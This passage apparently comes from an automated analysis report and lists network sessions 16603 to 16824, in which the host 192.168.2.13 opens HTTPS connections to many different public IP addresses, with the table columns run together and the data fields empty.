                                        16603192.168.2.134078046.174.93.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16604192.168.2.1352286195.187.191.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16605192.168.2.1354514101.179.4.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16606192.168.2.133660686.136.6.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16607192.168.2.13402005.76.199.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16608192.168.2.1337816117.168.233.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16609192.168.2.135062078.137.4.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16610192.168.2.1334046139.239.249.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16611192.168.2.1357482167.28.144.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16612192.168.2.133958279.104.153.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16613192.168.2.1336208150.74.175.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16614192.168.2.1351662144.27.199.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16615192.168.2.1360052108.85.230.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16616192.168.2.136068818.155.249.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16617192.168.2.1339516156.152.206.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16618192.168.2.134831241.29.135.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16619192.168.2.135948290.244.18.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16620192.168.2.1352012125.174.37.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16621192.168.2.13499845.159.244.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16622192.168.2.135231618.111.157.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16623192.168.2.134733267.59.121.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16624192.168.2.134602237.29.143.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16625192.168.2.136041082.255.178.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16626192.168.2.134075657.82.37.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16627192.168.2.1345560182.156.41.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16628192.168.2.13493089.246.169.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16629192.168.2.1340758155.117.125.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16630192.168.2.133821693.36.99.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16631192.168.2.133887062.168.62.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16632192.168.2.1333910101.158.224.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16633192.168.2.135932420.3.187.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16634192.168.2.1350196153.0.229.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16635192.168.2.1337356198.218.97.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16636192.168.2.133951497.16.21.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16637192.168.2.1347866210.102.143.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16638192.168.2.136033684.192.166.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16639192.168.2.134514819.82.247.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16640192.168.2.134684071.137.209.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16641192.168.2.1347214223.0.222.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16642192.168.2.134013432.156.239.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16643192.168.2.1336008123.102.147.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16644192.168.2.1355582151.73.132.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16645192.168.2.1350294216.52.105.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16646192.168.2.1337796216.160.100.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16647192.168.2.1356856106.238.174.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16648192.168.2.1354268162.23.212.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16649192.168.2.1349812126.222.83.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16650192.168.2.135611631.125.68.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16651192.168.2.1348360135.146.94.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16652192.168.2.1342696189.189.10.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16653192.168.2.1340126169.218.242.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16654192.168.2.1358622159.175.73.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16655192.168.2.134675846.34.135.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16656192.168.2.1337314129.84.45.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16657192.168.2.134270291.118.97.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16658192.168.2.1346870178.173.184.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16659192.168.2.1357172138.138.173.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16660192.168.2.1339024185.82.22.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16661192.168.2.1356936190.98.87.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16662192.168.2.133902884.169.57.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16663192.168.2.133994299.22.182.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16664192.168.2.1360522142.166.131.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16665192.168.2.1334990118.26.8.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16666192.168.2.1359728156.198.229.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16667192.168.2.1339930137.10.167.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16668192.168.2.133901853.195.185.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16669192.168.2.133861874.247.191.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16670192.168.2.1354538138.208.95.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16671192.168.2.1339138103.64.205.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16672192.168.2.1344310131.165.32.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16673192.168.2.133620063.162.22.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16674192.168.2.1360370163.205.51.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16675192.168.2.135158214.46.180.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16676192.168.2.1333532193.94.122.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16677192.168.2.1358466175.237.45.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16678192.168.2.1356354128.135.238.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16679192.168.2.135639294.34.71.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16680192.168.2.1353554176.75.15.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16681192.168.2.133789047.23.121.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16682192.168.2.135391247.126.240.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16683192.168.2.133908636.46.124.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16684192.168.2.133644468.89.115.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16685192.168.2.1342306155.131.188.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16686192.168.2.1355578170.84.160.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16687192.168.2.1337614136.242.17.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16688192.168.2.1342270143.94.137.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16689192.168.2.136066419.50.61.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16690192.168.2.13478942.132.106.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16691192.168.2.133758817.6.199.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16692192.168.2.1359552100.196.35.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16693192.168.2.134301679.190.151.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16694192.168.2.134207070.75.241.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16695192.168.2.1347840180.202.255.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16696192.168.2.1353332221.239.139.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16697192.168.2.1352012132.196.3.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16698192.168.2.1359894136.8.6.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16699192.168.2.1355822164.112.109.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16700192.168.2.135750089.21.25.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16701192.168.2.1340336136.186.150.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16702192.168.2.1344472110.24.110.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16703192.168.2.1345178113.239.167.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16704192.168.2.1359206195.238.230.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16705192.168.2.1339190200.18.108.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16706192.168.2.1346266104.88.88.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16707192.168.2.134825459.56.251.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16708192.168.2.135313631.148.90.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16709192.168.2.1337272129.252.80.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16710192.168.2.13477049.102.137.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16711192.168.2.1338910159.117.67.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16712192.168.2.1335746143.117.7.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16713192.168.2.1338702178.27.83.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16714192.168.2.1340254194.72.65.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16715192.168.2.133936877.232.132.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16716192.168.2.1346956211.87.96.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16717192.168.2.133672681.220.52.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16718192.168.2.134430039.183.243.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16719192.168.2.135998413.88.189.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16720192.168.2.1353962170.86.122.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16721192.168.2.133777672.230.240.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16722192.168.2.1335470194.171.192.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16723192.168.2.135443892.141.72.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16724192.168.2.1351024176.102.184.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16725192.168.2.1350886217.180.111.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16726192.168.2.1349768138.163.249.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16727192.168.2.1340706212.148.47.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16728192.168.2.1340154150.109.60.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16729192.168.2.135130635.81.15.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16730192.168.2.134479068.250.227.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16731192.168.2.135986644.217.174.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16732192.168.2.1358506173.246.245.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16733192.168.2.135271445.139.209.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16734192.168.2.1338928151.233.36.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16735192.168.2.134203027.123.122.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16736192.168.2.1339068125.227.203.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16737192.168.2.1355802128.201.110.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16738192.168.2.133716483.157.50.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16739192.168.2.134388865.118.61.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16740192.168.2.1355532129.179.105.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16741192.168.2.1353082216.118.115.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16742192.168.2.1336206118.57.142.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16743192.168.2.1343900185.228.49.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16744192.168.2.1332986187.168.36.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16745192.168.2.1349142140.157.39.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16746192.168.2.135153659.102.244.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16747192.168.2.134427869.253.41.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16748192.168.2.135805046.89.10.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16749192.168.2.1351530112.129.223.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16750192.168.2.1339834181.204.35.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16751192.168.2.133618036.234.58.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16752192.168.2.1333942187.223.123.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16753192.168.2.133395862.247.124.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16754192.168.2.134509096.170.135.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16755192.168.2.1349736195.178.2.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16756192.168.2.1335260221.222.68.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16757192.168.2.1339958211.117.136.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16758192.168.2.1342064173.109.121.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16759192.168.2.135152275.254.73.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16760192.168.2.133915861.51.76.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16761192.168.2.1349638163.243.214.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16762192.168.2.1333140123.99.212.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16763192.168.2.1353896223.153.69.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16764192.168.2.1353108216.177.82.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16765192.168.2.1355586100.24.161.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16766192.168.2.1351020159.249.135.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16767192.168.2.1334986176.188.80.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16768192.168.2.1343318103.117.78.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16769192.168.2.1346324222.179.114.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16770192.168.2.13467869.102.104.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16771192.168.2.1333358110.98.134.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16772192.168.2.1347568198.246.70.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16773192.168.2.135890891.137.63.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16774192.168.2.135374493.53.100.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16775192.168.2.1356754210.33.176.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16776192.168.2.1348794217.168.250.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16777192.168.2.134395292.187.134.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16778192.168.2.1343182113.77.218.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16779192.168.2.134097048.154.98.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16780192.168.2.1356202188.43.111.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16781192.168.2.1359964154.81.68.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16782192.168.2.134725646.44.12.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16783192.168.2.135637060.167.127.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16784192.168.2.135044246.0.6.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16785192.168.2.1340986211.49.223.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16786192.168.2.135300451.127.73.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16787192.168.2.135299852.57.96.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16788192.168.2.1348650111.237.139.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16789192.168.2.134091652.253.142.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16790192.168.2.133910459.169.172.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16791192.168.2.134614253.198.41.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16792192.168.2.135239035.117.117.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16793192.168.2.135103813.137.91.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16794192.168.2.1346474131.207.126.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16795192.168.2.1357720165.83.48.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16796192.168.2.134295042.135.198.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16797192.168.2.1355410126.95.159.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16798192.168.2.134057220.24.123.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16799192.168.2.133509884.24.168.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16800192.168.2.134218286.87.74.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16801192.168.2.1336366198.77.121.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16802192.168.2.1353142112.12.226.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16803192.168.2.133791275.174.135.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16804192.168.2.1360954149.11.135.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16805192.168.2.1341464203.130.57.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16806192.168.2.1352880118.223.14.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16807192.168.2.1358398107.182.229.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16808192.168.2.1343338194.3.220.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16809192.168.2.1354870178.16.213.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16810192.168.2.135267437.5.93.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16811192.168.2.1348464176.127.13.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16812192.168.2.1347436169.22.202.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16813192.168.2.135883432.159.153.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16814192.168.2.1339438159.244.186.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16815192.168.2.1350782204.163.163.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16816192.168.2.135375282.200.14.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16817192.168.2.13394929.171.43.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16818192.168.2.134193097.222.232.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16819192.168.2.1337260175.213.176.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16820192.168.2.135362417.100.66.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16821192.168.2.134717853.86.40.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16822192.168.2.135104848.5.22.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16823192.168.2.134724285.192.131.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16824192.168.2.1360150183.67.54.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
